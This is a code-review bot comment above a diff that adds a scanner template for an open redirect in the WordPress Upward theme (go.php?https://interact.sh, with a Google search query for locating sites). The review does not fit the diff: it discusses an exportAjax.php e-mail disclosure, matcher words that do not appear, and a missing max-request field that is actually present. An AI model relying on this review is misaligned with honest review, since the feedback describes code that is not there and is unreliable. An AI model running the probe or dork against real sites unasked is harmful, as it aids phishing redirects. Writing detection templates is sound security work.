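Review bot: The `metadata` block has no `max-request: 1`, unlike the other templates in this batch. The description is generic boilerplate, while the matcher words `Name`, `CategoriesTags` and `email` indicate that `exportAjax.php` returns the store export — including e-mail addresses — without authentication, which is an information-disclosure finding; a description such as "exportAjax.php is reachable without authentication and returns the store list (name, categories/tags, e-mail address) as an export" and a `disclosure`/`exposure` tag would describe it better than `misconfig`. Since `Name` and `email` alone are common words, requiring all three via `contains_all(body, "Name", "CategoriesTags", "email")` also reads cleaner than the `&&` chain.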
@@ -0,0 +1,26 @@ +id: wp-upward-theme-redirect + +info: + name: WordPress Upward Themes <1.5 - Open Redirect + author: r3Y3r53 + severity: medium + description: | + WordPress Upward Themes 1.5 accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. + reference: + - https://cxsecurity.com/issue/WLB-2020030133 + metadata: + max-request: 1 + verified: true + google-query: inurl:"/wp-content/themes/Upward/" + tags: wordpress,wp-theme,wp,upward,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Upward/go.php?https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'